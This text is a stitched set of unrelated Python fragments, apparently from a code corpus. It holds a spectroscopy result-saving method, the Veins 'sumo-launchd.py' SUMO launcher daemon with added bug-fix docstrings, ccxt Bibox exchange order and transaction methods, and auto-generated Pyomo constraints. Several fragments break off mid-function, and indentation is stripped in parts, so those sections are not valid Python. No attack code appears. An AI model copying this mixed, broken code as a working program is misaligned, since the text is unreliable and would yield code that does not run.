# print "Going to add this", sb
try:
self.sb_results = np.vstack((self.sb_results, np.hstack((sb, self.full_dict[sb]))))
except ValueError:
# print "It didn't exist yet!"
self.sb_results = np.hstack((sb, self.full_dict[sb]))
# print "and I made this array:", self.sb_results[:, 0]
def save_processing(self, file_name, folder_str, marker='', index='', verbose=''):
"""
This will save all of the self.proc_data and the results from the
fitting of this individual file.
Format:
fit_fname = file_name + '_' + marker + '_' + str(index) + '_full.txt'
Inputs:
file_name = the beginning of the file name to be saved
folder_str = the location of the folder where the file will be saved,
will create the folder, if necessary.
marker = I...I don't know what this was originally for
index = used to keep these files from overwriting themselves when in a
list
Outputs:
Two files, one that is self.proc_data, the other is self.sb_results
"""
try:
os.mkdir(folder_str)
except OSError as e:
if e.errno == errno.EEXIST:
pass
else:
| |
<gh_stars>0
#!/usr/bin/env python2
#
# sumo-launchd.py -- SUMO launcher daemon for use with TraCI clients
# Copyright (C) 2006-2012 <NAME> <<EMAIL>>
#
# Documentation for these modules is at http://veins.car2x.org/
#
# SPDX-License-Identifier: GPL-2.0-or-later
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
#
"""
For each incoming TCP connection the daemon receives a launch configuration.
It starts SUMO accordingly, then proxies all TraCI Messages.
The launch configuration must be sent in the very first TraCI message.
This message must contain a single command, CMD_FILE_SEND and be used to
send a file named "sumo-launchd.launch.xml", which has the following
structure:
<?xml version="1.0"?>
<launch>
<basedir path="/home/sommer/src/inet/examples/erlangen6" />
<seed value="1234" />
<copy file="net.net.xml" />
<copy file="routes.rou.xml" />
<copy file="sumo.sumo.cfg" type="config" />
</launch>
"""
import os
import sys
import tempfile
import shutil
import socket
import struct
import subprocess
import time
import signal
import exceptions
import thread
import xml.dom.minidom
import select
import logging
import atexit
from optparse import OptionParser
_API_VERSION = 1
_LAUNCHD_VERSION = 'sumo-launchd.py 1.00'
_CMD_GET_VERSION = 0x00
_CMD_FILE_SEND = 0x75
_SUMO_HOST = '127.0.0.1'
_SUMO_PORT = 10002
class UnusedPortLock:
    """
    Guard serializing the window between picking an unused port and SUMO
    actually binding it, so concurrent handlers don't grab the same port.

    Usable via explicit acquire()/release() or as a context manager.
    """
    # Single process-wide lock shared by all instances.
    lock = thread.allocate_lock()

    def __init__(self):
        self.acquired = False

    def __enter__(self):
        self.acquire()

    def __exit__(self, exc_type, exc_value, traceback):
        # Bug fix: __exit__ must accept the exception triple; the old
        # zero-argument signature made `with UnusedPortLock():` raise a
        # TypeError on scope exit.
        self.release()

    def acquire(self):
        # Idempotent: a second acquire() on the same instance is a no-op,
        # which also prevents self-deadlock on the non-reentrant lock.
        if not self.acquired:
            logging.debug("Claiming lock on port")
            UnusedPortLock.lock.acquire()
            self.acquired = True

    def release(self):
        if self.acquired:
            logging.debug("Releasing lock on port")
            UnusedPortLock.lock.release()
            self.acquired = False
def find_unused_port():
    """
    Ask the OS for a currently unused TCP port number and return it.

    Binds a throwaway listening socket to port 0 (kernel-assigned), reads
    back the assigned port, and closes the socket again.
    """
    probe = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0)
    probe.bind(('127.0.0.1', 0))
    probe.listen(socket.SOMAXCONN)
    port = probe.getsockname()[1]
    probe.close()
    return port
def forward_connection(client_socket, server_socket, process):
    """
    Proxy data between client_socket and server_socket until either side
    closes (empty read) or errors out.

    :param client_socket: connected TraCI client socket
    :param server_socket: connected SUMO socket
    :param process: the SUMO subprocess (unused here; kept for interface
        compatibility with callers)

    Bug fix: the old code forwarded `data` from a `finally:` block, so a
    failed recv() either raised NameError (nothing received yet) or re-sent
    stale data. Data is now only forwarded after a successful, non-empty
    read. The EOF check uses truthiness (`not data`) so it also works for
    bytes under Python 3.
    """
    logging.debug("Starting proxy mode")
    client_socket.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
    server_socket.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
    do_exit = False
    while not do_exit:
        (r, w, e) = select.select([client_socket, server_socket], [], [client_socket, server_socket], 1)
        if client_socket in e:
            do_exit = True
        if server_socket in e:
            do_exit = True
        if client_socket in r:
            try:
                data = client_socket.recv(65535)
            except socket.error:
                do_exit = True
            else:
                if not data:
                    # Peer closed the connection (empty read).
                    do_exit = True
                else:
                    server_socket.send(data)
        if server_socket in r:
            try:
                data = server_socket.recv(65535)
            except socket.error:
                do_exit = True
            else:
                if not data:
                    do_exit = True
                else:
                    client_socket.send(data)
    logging.debug("Done with proxy mode")
def parse_launch_configuration(launch_xml_string):
    """
    Parse a launch configuration document and return its settings.

    :param launch_xml_string: XML text whose root element is <launch>
    :return: tuple (basedir, copy_nodes, seed) where basedir defaults to "",
        seed to 23423, and copy_nodes is the list of direct <copy> children
    :raises RuntimeError: on a wrong root element or duplicate
        <basedir>/<seed> nodes
    """
    doc = xml.dom.minidom.parseString(launch_xml_string)
    launch_node = doc.documentElement
    if launch_node.tagName != "launch":
        raise RuntimeError("launch config root element not <launch>, but <%s>" % launch_node.tagName)

    def direct_children(tag):
        # Only elements whose immediate parent is <launch> count.
        return [node for node in launch_node.getElementsByTagName(tag) if node.parentNode == launch_node]

    basedir = ""
    basedir_nodes = direct_children("basedir")
    if len(basedir_nodes) > 1:
        raise RuntimeError('launch config contains %d <basedir> nodes, expected at most 1' % (len(basedir_nodes)))
    if basedir_nodes:
        basedir = basedir_nodes[0].getAttribute("path")
    logging.debug("Base dir is %s" % basedir)

    seed = 23423
    seed_nodes = direct_children("seed")
    if len(seed_nodes) > 1:
        raise RuntimeError('launch config contains %d <seed> nodes, expected at most 1' % (len(seed_nodes)))
    if seed_nodes:
        seed = int(seed_nodes[0].getAttribute("value"))
    logging.debug("Seed is %d" % seed)

    copy_nodes = direct_children("copy")
    return (basedir, copy_nodes, seed)
def run_sumo(runpath, sumo_command, shlex, config_file_name, remote_port, seed, client_socket, unused_port_lock, keep_temp):
    """
    Actually run SUMO.

    Starts the SUMO subprocess, connects to its TraCI port (retrying up to
    10 times with increasing back-off), proxies traffic between the TraCI
    client and SUMO, then tears the process down (SIGTERM, then SIGKILL)
    and returns a result XML document with exit code, timing, and the
    captured stdout/stderr.

    NOTE(review): this module targets Python 2 (`except ..., e` syntax,
    `unicode`, `thread`, `exceptions`).

    :param runpath: working directory for SUMO and its log files
    :param sumo_command: executable name, or a full command line containing
        a '{}' placeholder when `shlex` is true
    :param shlex: if true, split sumo_command shell-style (the parameter is
        shadowed by `import shlex` below)
    :param config_file_name: SUMO config file, relative to runpath
    :param remote_port: TraCI port SUMO was configured to listen on (only
        logged here; the actual connect uses _SUMO_HOST/_SUMO_PORT)
    :param seed: RNG seed (only used for logging here)
    :param client_socket: already-connected TraCI client socket
    :param unused_port_lock: released once the connection is established
    :param keep_temp: unused in this function; kept for interface symmetry
    :return: result XML string describing the run
    """
    # create log files
    sumoLogOut = open(os.path.join(runpath, 'sumo-launchd.out.log'), 'w')
    sumoLogErr = open(os.path.join(runpath, 'sumo-launchd.err.log'), 'w')
    # start SUMO
    sumo_start = int(time.time())
    sumo_end = None
    sumo_returncode = -1
    sumo_status = None
    try:
        cmd = []
        if shlex:
            # Shadows the boolean parameter of the same name from here on.
            import shlex
            cmd = shlex.split(sumo_command.replace('{}', '-c ' + unicode(config_file_name).encode()))
        else:
            cmd = [sumo_command, "-c", config_file_name]
        logging.info("Starting SUMO (%s) on port %d, seed %d" % (" ".join(cmd), remote_port, seed))
        sumo = subprocess.Popen(cmd, cwd=runpath, stdin=None, stdout=sumoLogOut, stderr=sumoLogErr)
        sumo_socket = None
        connected = False
        tries = 1
        # `connected` is never set True -- the loop exits via break (on
        # success) or the re-raise after 10 failed attempts.
        while not connected:
            try:
                logging.debug("Connecting to SUMO (%s) on port %d (try %d)" % (" ".join(cmd), remote_port, tries))
                sumo_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                # ----- DEFAULT: default code. -----
                # sumo_socket.connect(('127.0.0.1', remote_port))
                # ----- START: my code. -----
                # Local modification: connect to a fixed host/port instead
                # of the per-run remote_port chosen above.
                global _SUMO_PORT
                global _SUMO_HOST
                sumo_socket.connect((_SUMO_HOST, _SUMO_PORT))
                # ----- END: my code. -----
                handle_set_order(sumo_socket, 1)
                break
            except socket.error, e:
                logging.debug("Error (%s)" % e)
                if tries >= 10:
                    raise
                # Linear back-off before the next attempt.
                time.sleep(tries * 0.25)
                tries += 1
        unused_port_lock.release()
        forward_connection(client_socket, sumo_socket, sumo)
        client_socket.close()
        sumo_socket.close()
        logging.debug("Done with proxy mode, killing SUMO")
        # Reap SUMO in the background, then escalate if it lingers.
        thread.start_new_thread(subprocess.Popen.wait, (sumo, ))
        time.sleep(0.5)
        if sumo.returncode == None:
            logging.debug("SIGTERM")
            os.kill(sumo.pid, signal.SIGTERM)
            time.sleep(0.5)
            if sumo.returncode == None:
                logging.debug("SIGKILL")
                os.kill(sumo.pid, signal.SIGKILL)
                time.sleep(1)
                if sumo.returncode == None:
                    logging.debug("Warning: SUMO still not dead. Waiting 10 more seconds...")
                    time.sleep(10)
        logging.info("Done running SUMO")
        sumo_returncode = sumo.returncode
        if sumo_returncode == 0:
            sumo_status = "Done."
        elif sumo_returncode != None:
            sumo_status = "Exited with error code %d" % sumo_returncode
        else:
            sumo_returncode = -1
            sumo_status = "Undef"
    except OSError, e:
        sumo_status = "Could not start SUMO (%s): %s" % (" ".join(cmd), e)
    except exceptions.SystemExit:
        sumo_status = "Premature launch script exit"
    except exceptions.KeyboardInterrupt:
        sumo_status = "Keyboard interrupt."
    except socket.error, e:
        sumo_status = "Could not connect to SUMO (%s). Might be protected by a personal firewall or crashed before a connection could be established." % e
    except:
        raise
    # statistics
    sumo_end = int(time.time())
    # close log files
    sumoLogOut.close()
    sumoLogErr.close()
    # read log files back so their contents can be embedded in the result
    sumoLogOut = open(os.path.join(runpath, 'sumo-launchd.out.log'), 'r')
    sumoLogErr = open(os.path.join(runpath, 'sumo-launchd.err.log'), 'r')
    sumo_stdout = sumoLogOut.read()
    sumo_stderr = sumoLogErr.read()
    sumoLogOut.close()
    sumoLogErr.close()
    # prepare result XML; log contents are CDATA-escaped by splitting any
    # embedded "]]>" across two CDATA sections.
    CDATA_START = '<![CDATA['
    CDATA_END = ']]>'
    result_xml = '<?xml version="1.0"?>\n'
    result_xml += '<status>\n'
    result_xml += '\t<%s>%s</%s>\n' % ("exit-code", sumo_returncode, "exit-code")
    if sumo_start:
        result_xml += '\t<%s>%s</%s>\n' % ("start", sumo_start, "start")
    if sumo_end:
        result_xml += '\t<%s>%s</%s>\n' % ("end", sumo_end, "end")
    if sumo_status:
        result_xml += '\t<%s>%s</%s>\n' % ("status", sumo_status, "status")
    result_xml += '\t<%s>%s</%s>\n' % ("stdout", CDATA_START + sumo_stdout.replace(CDATA_END, CDATA_END + CDATA_END + CDATA_START) + CDATA_END, "stdout")
    result_xml += '\t<%s>%s</%s>\n' % ("stderr", CDATA_START + sumo_stderr.replace(CDATA_END, CDATA_END + CDATA_END + CDATA_START) + CDATA_END, "stderr")
    result_xml += '</status>\n'
    return result_xml
def set_sumoconfig_option(config_parser, config_xml, section, key, value):
    """
    Add or replace a named config option (currently ignores the given section).

    :param config_parser: minidom Document used to create new elements
    :param config_xml: element under which the option node lives
    :param section: unused; kept for interface compatibility
    :param key: tag name of the option node
    :param value: stored (stringified) in the node's "value" attribute
    :raises RuntimeError: if more than one node with that tag already exists
    """
    key_nodes = config_xml.getElementsByTagName(key)
    if len(key_nodes) > 1:
        # Bug fix: the old message referenced an undefined name
        # (file_dst_name) and swapped the %d/%s arguments, so triggering
        # this path raised a NameError instead of the intended error.
        raise RuntimeError('config file contains %d <%s> nodes, expected at most 1' % (len(key_nodes), key))
    elif len(key_nodes) < 1:
        key_node = config_parser.createElement(key)
        key_node.setAttribute("value", str(value))
        config_xml.appendChild(key_node)
    else:
        key_node = key_nodes[0]
        # Bug fix: childNodes is a live list; iterate over a snapshot so
        # removal doesn't skip every other child.
        for n in list(key_node.childNodes):
            key_node.removeChild(n)
        key_node.setAttribute("value", str(value))
def copy_and_modify_files(basedir, copy_nodes, runpath, remote_port, seed):
    """
    Copy (and modify) the files named by <copy> nodes into runpath; return
    the config file name.

    The node flagged type="config" is parsed and patched with the TraCI
    remote port and a fixed RNG seed before being written out.

    :param basedir: directory the source files are read from
    :param copy_nodes: list of <copy> DOM elements from the launch config
    :param runpath: destination directory
    :param remote_port: written into the config's remote-port option
    :param seed: written into the config's seed option
    :return: destination name of the config file within runpath
    :raises RuntimeError: on unsafe names, missing files, nodes without a
        destination or contents, or if no config file was among the nodes
    """
    config_file_name = None
    for copy_node in copy_nodes:
        file_src_name = None
        file_dst_name = None
        file_contents = None
        # Read from disk?
        if copy_node.hasAttribute("file"):
            file_src_name = copy_node.getAttribute("file")
            file_src_path = os.path.join(basedir, file_src_name)
            # Sanity check: refuse path separators so a launch config
            # cannot reference files outside the base directory.
            if file_src_name.find("/") != -1:
                raise RuntimeError('name of file to copy "%s" contains a "/"' % file_src_name)
            if not os.path.exists(file_src_path):
                raise RuntimeError('file "%s" does not exist' % file_src_path)
            # Read contents
            file_handle = open(file_src_path, 'rb')
            file_contents = file_handle.read()
            file_handle.close()
        # By now we need a destination name and contents
        if copy_node.hasAttribute("name"):
            file_dst_name = copy_node.getAttribute("name")
        elif file_src_name:
            file_dst_name = file_src_name
        else:
            raise RuntimeError('<copy> node with no destination name: %s' % copy_node.toxml())
        if file_contents == None:
            raise RuntimeError('<copy> node with no contents: %s' % copy_node.toxml())
        # Is this our config file? If so, patch it before writing.
        if copy_node.getAttribute("type") == "config":
            config_file_name = file_dst_name
            config_parser = xml.dom.minidom.parseString(file_contents)
            config_xml = config_parser.documentElement
            set_sumoconfig_option(config_parser, config_xml, "traci_server", "remote-port", remote_port)
            set_sumoconfig_option(config_parser, config_xml, "random_number", "seed", seed)
            set_sumoconfig_option(config_parser, config_xml, "random_number", "random", "false")
            # NOTE(review): toxml() returns text, which is then written to a
            # binary-mode file -- fine on Python 2 (str == bytes) but would
            # need an encode() on Python 3; confirm target interpreter.
            file_contents = config_xml.toxml()
        # Write file into rundir
        file_dst_path = os.path.join(runpath, file_dst_name)
        file_handle = open(file_dst_path, "wb")
        file_handle.write(file_contents)
        file_handle.close()
    # make sure that we copied a config file
    if not config_file_name:
        raise RuntimeError('launch config contained no <copy> node with type="config"')
    return config_file_name
def handle_launch_configuration(sumo_command, shlex, launch_xml_string, client_socket, keep_temp):
"""
Process launch configuration in launch_xml_string.
"""
# create temporary directory
logging.debug("Creating temporary directory...")
runpath = tempfile.mkdtemp(prefix="sumo-launchd-tmp-")
if not runpath:
raise RuntimeError("Could not create temporary directory")
if not os.path.exists(runpath):
raise RuntimeError('Temporary directory "%s" does not exist, even though it should have | |
'body': self.extend(request, params),
})
#
# {
# "result":[
# {
# "result":{
# "count":1,
# "page":1,
# "items":[
# {
# "id":612867,
# "coin_symbol":"ETH",
# "chain_type":"ETH",
# "to_address":"0xd41de7a88ab5fc59edc6669f54873576be95bff1",
# "tx_id":"0xc60950596227af3f27c3a1b5911ea1c79bae53bdce67274e48a0ce87a5ef2df8",
# "addr_remark":"binance",
# "amount":"2.34550946",
# "fee":"0.00600000",
# "createdAt":1561339330000,
# "memo":"",
# "status":3
# }
# ]
# },
# "cmd":"transfer/transferOutList"
# }
# ]
# }
#
outerResults = self.safe_value(response, 'result')
firstResult = self.safe_value(outerResults, 0, {})
innerResult = self.safe_value(firstResult, 'result', {})
withdrawals = self.safe_value(innerResult, 'items', [])
for i in range(0, len(withdrawals)):
withdrawals[i]['type'] = 'withdrawal'
return self.parse_transactions(withdrawals, currency, since, limit)
def parse_transaction(self, transaction, currency=None):
    """
    Parse a raw bibox deposit/withdrawal record (or a withdraw() response)
    into a unified ccxt transaction structure.

    fetchDeposits item:
        {'id': 1023291, 'coin_symbol': 'ETH', 'to_address': '0x7263....',
         'amount': '0.49170000', 'confirmCount': '16',
         'createdAt': 1553123867000, 'status': 2}
    fetchWithdrawals item additionally carries 'addr_remark', 'fee', 'memo'.
    withdraw response:
        {"result": 228, "cmd": "transfer/transferOut"}  # result is the id

    :param dict transaction: the raw exchange payload
    :param dict currency: optional unified currency used to resolve the code
    :returns dict: a unified transaction structure
    """
    # withdraw() puts the id under 'result', the history endpoints under 'id'
    id = self.safe_string_2(transaction, 'id', 'result')
    address = self.safe_string(transaction, 'to_address')
    currencyId = self.safe_string(transaction, 'coin_symbol')
    code = self.safe_currency_code(currencyId, currency)
    # FIX: 'createdAt' is a millisecond epoch integer; it was previously read
    # with safe_string, which broke iso8601() and any timestamp arithmetic
    timestamp = self.safe_integer(transaction, 'createdAt')
    tag = self.safe_string(transaction, 'addr_remark')
    # 'type' is injected by fetch_deposits/fetch_withdrawals before parsing
    type = self.safe_string(transaction, 'type')
    status = self.parse_transaction_status_by_type(self.safe_string(transaction, 'status'), type)
    amount = self.safe_number(transaction, 'amount')
    feeCost = self.safe_number(transaction, 'fee')
    if type == 'deposit':
        # deposits carry no fee and no address remark on bibox
        feeCost = 0
        tag = None
    fee = {
        'cost': feeCost,
        'currency': code,
    }
    return {
        'info': transaction,
        'id': id,
        'txid': None,
        'timestamp': timestamp,
        'datetime': self.iso8601(timestamp),
        'network': None,
        'address': address,
        'addressTo': None,
        'addressFrom': None,
        'tag': tag,
        'tagTo': None,
        'tagFrom': None,
        'type': type,
        'amount': amount,
        'currency': code,
        'status': status,
        'updated': None,
        'fee': fee,
    }
def parse_transaction_status_by_type(self, status, type=None):
    """
    Map a raw numeric bibox status code to a unified status string,
    using a different code table per transaction type. Unknown codes
    (and unknown types) fall through unchanged.
    """
    deposit_codes = {
        '1': 'pending',
        '2': 'ok',
    }
    withdrawal_codes = {
        '0': 'pending',
        '3': 'ok',
    }
    tables = {
        'deposit': deposit_codes,
        'withdrawal': withdrawal_codes,
    }
    table = self.safe_value(tables, type, {})
    return self.safe_string(table, status, status)
def create_order(self, symbol, type, side, amount, price=None, params={}):
    """
    create a trade order
    :param str symbol: unified symbol of the market to create an order in
    :param str type: 'market' or 'limit'
    :param str side: 'buy' or 'sell'
    :param float amount: how much of currency you want to trade in units of base currency
    :param float price: the price at which the order is to be fullfilled, in units of the quote currency, ignored in market orders
    :param dict params: extra parameters specific to the bibox api endpoint
    :returns dict: an `order structure <https://docs.ccxt.com/en/latest/manual.html#order-structure>`
    """
    self.load_markets()
    market = self.market(symbol)
    # bibox encodes type/side as small integers: 1=market, 2=limit; 1=buy, 2=sell
    if type == 'limit':
        orderType = 2
    else:
        orderType = 1
    if side == 'buy':
        orderSide = 1
    else:
        orderSide = 2
    body = {
        'pair': market['id'],
        'account_type': 0,
        'order_type': orderType,
        'order_side': orderSide,
        'pay_bix': 0,
        'amount': amount,
        'price': price,
    }
    request = {
        'cmd': 'orderpending/trade',
        'body': self.extend(body, params),
    }
    response = self.privatePostOrderpending(request)
    # response shape: {"result":[{"result": "<order id>", "index": ..., "cmd": "orderpending/trade"}]}
    batch = self.safe_value(response, 'result')
    first = self.safe_value(batch, 0, {})
    id = self.safe_value(first, 'result')
    return {
        'info': response,
        'id': id,
    }
def cancel_order(self, id, symbol=None, params={}):
    """
    Cancel an open order by its exchange id.

    Note: a "result":"OK" reply only acknowledges that the server received
    the cancellation request; the actual outcome must be read from the
    order record itself.
    """
    body = self.extend({
        'orders_id': id,
    }, params)
    request = {
        'cmd': 'orderpending/cancelTrade',
        'body': body,
    }
    response = self.privatePostOrderpending(request)
    # response shape: {"result":[{"result":"OK", "index": ..., "cmd":"orderpending/cancelTrade"}]}
    batch = self.safe_value(response, 'result')
    return self.safe_value(batch, 0, {})
def fetch_order(self, id, symbol=None, params={}):
    """
    Fetch a single order by id from the spot account.

    Raises OrderNotFound when the exchange returns an empty record.
    The raw order payload carries coin_symbol/currency_symbol, price,
    amount, deal_amount, and a numeric status field (see parse_order).
    """
    self.load_markets()
    body = self.extend({
        'id': str(id),
        'account_type': 0,  # 0 = spot account
    }, params)
    response = self.privatePostOrderpending({
        'cmd': 'orderpending/order',
        'body': body,
    })
    # response shape: {"result":[{"result": {...raw order...}, "cmd":"orderpending/order"}]}
    batch = self.safe_value(response, 'result')
    first = self.safe_value(batch, 0, {})
    order = self.safe_value(first, 'result')
    if self.is_empty(order):
        raise OrderNotFound(self.id + ' order ' + id + ' not found')
    return self.parse_order(order)
def parse_order(self, order, market=None):
    """
    Convert a raw bibox order payload into a unified ccxt order structure.
    The market is resolved from coin_symbol/currency_symbol when both are
    present, otherwise the passed-in market (if any) is used.
    """
    baseId = self.safe_string(order, 'coin_symbol')
    quoteId = self.safe_string(order, 'currency_symbol')
    marketId = None
    if (baseId is not None) and (quoteId is not None):
        marketId = baseId + '_' + quoteId
    market = self.safe_market(marketId, market)
    # order_type: 1 = market, 2 = limit
    if self.safe_string(order, 'order_type') == '1':
        type = 'market'
    else:
        type = 'limit'
    # order_side: 1 = buy, 2 = sell
    if self.safe_string(order, 'order_side') == '1':
        side = 'buy'
    else:
        side = 'sell'
    timestamp = self.safe_integer(order, 'createdAt')
    status = self.parse_order_status(self.safe_string(order, 'status'))
    feeCost = self.safe_string(order, 'fee')
    fee = None
    if feeCost is not None:
        fee = {
            'cost': feeCost,
            'currency': None,  # fee currency is not reported by the endpoint
        }
    return self.safe_order({
        'info': order,
        'id': self.safe_string(order, 'id'),
        'clientOrderId': None,
        'timestamp': timestamp,
        'datetime': self.iso8601(timestamp),
        'lastTradeTimestamp': None,
        'symbol': market['symbol'],
        'type': type,
        'timeInForce': None,
        'postOnly': None,
        'side': side,
        'price': self.safe_string(order, 'price'),
        'stopPrice': None,
        'amount': self.safe_string(order, 'amount'),
        'cost': self.safe_string_2(order, 'deal_money', 'money'),
        'average': self.safe_string(order, 'deal_price'),
        'filled': self.safe_string(order, 'deal_amount'),
        'remaining': None,
        'status': status,
        'fee': fee,
    }, market)
def parse_order_status(self, status):
    """
    Map a raw bibox order status code to a unified status string.
    Raw codes (per bibox docs): -1 fail, 0/1 to be dealt, 2 dealt partly,
    3 dealt totally, 4 cancelled partly, 5 cancelled totally,
    6 to be cancelled. Unknown codes pass through unchanged.
    """
    status_map = {
        '1': 'open',      # pending
        '2': 'open',      # part completed
        '3': 'closed',    # completed
        '4': 'canceled',  # part canceled
        '5': 'canceled',  # canceled
        '6': 'canceled',  # canceling
    }
    return self.safe_string(status_map, status, status)
def fetch_open_orders(self, symbol=None, since=None, limit=None, params={}):
    """
    Fetch all currently open spot orders, optionally restricted to one
    symbol. When no limit is given the endpoint is asked for 200 rows.
    """
    self.load_markets()
    market = None
    pair = None
    if symbol is not None:
        market = self.market(symbol)
        pair = market['id']
    size = limit if limit else 200
    body = {
        'pair': pair,
        'account_type': 0,  # 0 - regular, 1 - margin
        'page': 1,
        'size': size,
    }
    request = {
        'cmd': 'orderpending/orderPendingList',
        'body': self.extend(body, params),
    }
    response = self.privatePostOrderpending(request)
    # response shape: {"result":[{"result":{"count":..,"page":..,"items":[...raw orders...]},
    #                             "cmd":"orderpending/orderPendingList"}]}
    batch = self.safe_value(response, 'result')
    first = self.safe_value(batch, 0, {})
    payload = self.safe_value(first, 'result', {})
    raw_orders = self.safe_value(payload, 'items', [])
    return self.parse_orders(raw_orders, market, since, limit)
def fetch_closed_orders(self, symbol=None, since=None, limit=200, params={}):
if symbol is None:
raise ArgumentsRequired(self.id + ' fetchClosedOrders() requires a `symbol` argument')
self.load_markets()
market = self.market(symbol)
request = {
'cmd': 'orderpending/pendingHistoryList',
'body': self.extend({
'pair': market['id'],
'account_type': 0, # 0 - regular, 1 - margin
'page': 1,
'size': limit,
}, params),
}
response = self.privatePostOrderpending(request)
#
# {
# "result":[
# {
# "result":{
# "count":1,
# "page":1,
# "items":[
# {
# "id":"100055558128036",
# "createdAt": 1512756997000,
# "account_type":0,
# "coin_symbol":"LTC", # Trading Token
# "currency_symbol":"BTC", # Pricing Token
# "order_side":2, # Trading side 1-Buy, 2-Sell
# "order_type":2, # 2-limit order
# "price":"0.00900000", # order price
# "amount":"1.00000000", # order amount
# "money":"0.00900000", # currency amount(price * amount)
# "deal_amount":"0.00000000", # deal amount
# "deal_percent":"0.00%", # deal percentage
# "unexecuted":"0.00000000", # unexecuted amount
# "status":3 # Status,-1-fail, 0,1-to be dealt, 2-dealt partly, 3-dealt totally, 4- cancelled partly, 5-cancelled | |
- m.x381 - m.x385 - m.x413 - m.x417 + m.x745 == 0)
# --- Auto-generated Pyomo constraint section (do not edit by hand) ---
# Each m.cNNNN below is a linear equality over the m.xNNN variables.
# The structure (signed sums of x-variables plus one slack-like term per row,
# equal to a constant of 0/25/50/75/100) suggests node balance constraints
# from a converted network/transport model -- TODO confirm against the
# generator; variable meanings are not recoverable from this chunk.
m.c1127 = Constraint(expr= m.x322 + m.x354 + m.x386 + m.x418 + m.x746 == 100)
m.c1128 = Constraint(expr= m.x323 + m.x355 + m.x387 + m.x419 + m.x747 == 0)
m.c1129 = Constraint(expr= m.x324 + m.x356 + m.x388 + m.x420 + m.x748 == 0)
m.c1130 = Constraint(expr= m.x325 + m.x357 + m.x389 + m.x421 + m.x749 == 0)
m.c1131 = Constraint(expr= m.x326 + m.x358 + m.x390 + m.x422 + m.x750 == 0)
m.c1132 = Constraint(expr= m.x327 + m.x359 + m.x391 + m.x423 + m.x751 == 100)
m.c1133 = Constraint(expr= m.x328 + m.x360 + m.x392 + m.x424 + m.x752 == 0)
m.c1134 = Constraint(expr= m.x329 + m.x361 + m.x393 + m.x425 + m.x753 == 0)
m.c1135 = Constraint(expr= - m.x322 + m.x330 + m.x334 - m.x354 + m.x362 + m.x366 - m.x386 + m.x394 + m.x398 - m.x418
                              + m.x426 + m.x430 + m.x754 == 25)
m.c1136 = Constraint(expr= - m.x323 + m.x331 + m.x335 - m.x355 + m.x363 + m.x367 - m.x387 + m.x395 + m.x399 - m.x419
                              + m.x427 + m.x431 + m.x755 == 0)
m.c1137 = Constraint(expr= - m.x324 + m.x332 + m.x336 - m.x356 + m.x364 + m.x368 - m.x388 + m.x396 + m.x400 - m.x420
                              + m.x428 + m.x432 + m.x756 == 0)
m.c1138 = Constraint(expr= - m.x325 + m.x333 + m.x337 - m.x357 + m.x365 + m.x369 - m.x389 + m.x397 + m.x401 - m.x421
                              + m.x429 + m.x433 + m.x757 == 0)
m.c1139 = Constraint(expr= - m.x326 + m.x338 + m.x342 - m.x358 + m.x370 + m.x374 - m.x390 + m.x402 + m.x406 - m.x422
                              + m.x434 + m.x438 + m.x758 == 0)
m.c1140 = Constraint(expr= - m.x327 + m.x339 + m.x343 - m.x359 + m.x371 + m.x375 - m.x391 + m.x403 + m.x407 - m.x423
                              + m.x435 + m.x439 + m.x759 == 75)
m.c1141 = Constraint(expr= - m.x328 + m.x340 + m.x344 - m.x360 + m.x372 + m.x376 - m.x392 + m.x404 + m.x408 - m.x424
                              + m.x436 + m.x440 + m.x760 == 0)
m.c1142 = Constraint(expr= - m.x329 + m.x341 + m.x345 - m.x361 + m.x373 + m.x377 - m.x393 + m.x405 + m.x409 - m.x425
                              + m.x437 + m.x441 + m.x761 == 0)
m.c1143 = Constraint(expr= - m.x330 - m.x338 + m.x346 - m.x362 - m.x370 + m.x378 - m.x394 - m.x402 + m.x410 - m.x426
                              - m.x434 + m.x442 + m.x762 == 0)
m.c1144 = Constraint(expr= - m.x331 - m.x339 + m.x347 - m.x363 - m.x371 + m.x379 - m.x395 - m.x403 + m.x411 - m.x427
                              - m.x435 + m.x443 + m.x763 == 0)
m.c1145 = Constraint(expr= - m.x332 - m.x340 + m.x348 - m.x364 - m.x372 + m.x380 - m.x396 - m.x404 + m.x412 - m.x428
                              - m.x436 + m.x444 + m.x764 == 50)
m.c1146 = Constraint(expr= - m.x333 - m.x341 + m.x349 - m.x365 - m.x373 + m.x381 - m.x397 - m.x405 + m.x413 - m.x429
                              - m.x437 + m.x445 + m.x765 == 0)
m.c1147 = Constraint(expr= - m.x334 - m.x342 + m.x350 - m.x366 - m.x374 + m.x382 - m.x398 - m.x406 + m.x414 - m.x430
                              - m.x438 + m.x446 + m.x766 == 0)
m.c1148 = Constraint(expr= - m.x335 - m.x343 + m.x351 - m.x367 - m.x375 + m.x383 - m.x399 - m.x407 + m.x415 - m.x431
                              - m.x439 + m.x447 + m.x767 == 0)
m.c1149 = Constraint(expr= - m.x336 - m.x344 + m.x352 - m.x368 - m.x376 + m.x384 - m.x400 - m.x408 + m.x416 - m.x432
                              - m.x440 + m.x448 + m.x768 == 0)
m.c1150 = Constraint(expr= - m.x337 - m.x345 + m.x353 - m.x369 - m.x377 + m.x385 - m.x401 - m.x409 + m.x417 - m.x433
                              - m.x441 + m.x449 + m.x769 == 50)
m.c1151 = Constraint(expr= - m.x346 - m.x350 - m.x378 - m.x382 - m.x410 - m.x414 - m.x442 - m.x446 + m.x770 == 0)
m.c1152 = Constraint(expr= - m.x347 - m.x351 - m.x379 - m.x383 - m.x411 - m.x415 - m.x443 - m.x447 + m.x771 == 0)
m.c1153 = Constraint(expr= - m.x348 - m.x352 - m.x380 - m.x384 - m.x412 - m.x416 - m.x444 - m.x448 + m.x772 == 0)
m.c1154 = Constraint(expr= - m.x349 - m.x353 - m.x381 - m.x385 - m.x413 - m.x417 - m.x445 - m.x449 + m.x773 == 0)
# Second group: same row pattern with one extra x-variable per row
